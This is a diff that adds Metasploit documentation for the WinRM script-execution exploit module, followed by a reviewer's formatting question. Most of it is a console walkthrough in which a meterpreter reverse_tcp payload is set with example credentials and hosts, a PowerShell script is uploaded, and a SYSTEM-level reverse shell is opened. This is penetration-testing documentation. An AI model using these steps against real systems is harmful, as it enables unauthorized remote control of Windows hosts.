documentation/modules/exploit/winrm/winrm_script_exec.md

```diff
@@ -0,0 +1,140 @@
+## Vulnerable Application
+
+WinRM, is a Windows-native built-in remote management protocol in its simplest form that uses Simple Object Access Protocol to interface with remote computers and servers, as well as Operating Systems and applications. It handles remote connections by means of the WS-Management Protocol, which is based on SOAP (Simple Object Access Protocol). 
+This module uses valid credentials to login to the WinRM service and execute a payload. It has two available methods for payload delivery: Powershell 2.0 and VBS CmdStager. This module will check if Poweshell 2.0 is available, and if so then it will use that method. Otherwise it falls back to the VBS CmdStager which is less stealthy.
+
+**IMPORTANT:-** If targetting an x64 system with the Poweshell method, one must select an x64 payload. An x86 payload will never return. 
+
+    
+
+
+## Example Usage
+
+```
+msf exploit(handler) > use exploit/windows/winrm/winrm_script_exec
+msf exploit(winrm_script_exec) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(winrm_script_exec) > set USERNAME admin
+USERNAME => admin
+msf exploit(winrm_script_exec) > set PASSWORD admin
+PASSWORD => admin
+msf exploit(winrm_script_exec) > set LHOST 192.168.198.138
+LHOST => 192.168.198.138
+msf exploit(winrm_script_exec) > set LPORT 4444
+LPORT => 4444
+msf exploit(winrm_script_exec) > set RHOST 192.168.198.130
+RHOST => 192.168.198.130
+
+**Powershell 2.0 is used for payload delivery here**
+
+msf  exploit(winrm_script_exec) > exploit
+[*] Started reverse TCP handler on 192.168.198.138:4444 
+[*] checking for Powershell 2.0
+[*] Attempting to set Execution Policy
+[+] Set Execution Policy Successfully
+[*] Grabbing %TEMP%
+[*] Uploading powershell script to C:\Users\ADMINI~1\AppData\Local\Temp\uFWUOIgQ.ps1 (This may take a few minutes)...
+[*] Attempting to execute script...
+[*] Sending stage (752128 bytes) to 192.168.198.130
+[*] Meterpreter session 1 opened (192.168.198.138:4444 -> 192.168.198.130:5985) at 2017-03-19 21:30:05 +0100
+meterpreter > 
+[*] Session ID 1 (192.168.198.138:4444 -> 192.168.198.130:5985) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'
+[*] Current server process: powershell.exe (608)
+[+] Migrating to 568
+[+] Successfully migrated to process 
+meterpreter > sysinfo
+gComputer        : WIN-JZF4OTQMX4W
+OS              : Windows 2008 (Build 6002, Service Pack 2).
+Architecture    : x86
+System Language : en_US
+Meterpreter     : x86/win32
+meterpreter > getuid
+gServer username: NT AUTHORITY\SYSTEM
+meterpreter > getpid
+Current pid: 568
+meterpreter > 
+
+**In case the VBS CmdStager is used for payload delivery here**
+
```

Comment:
Should I start a code block using triple ticks too? And are triple ticks '###' ?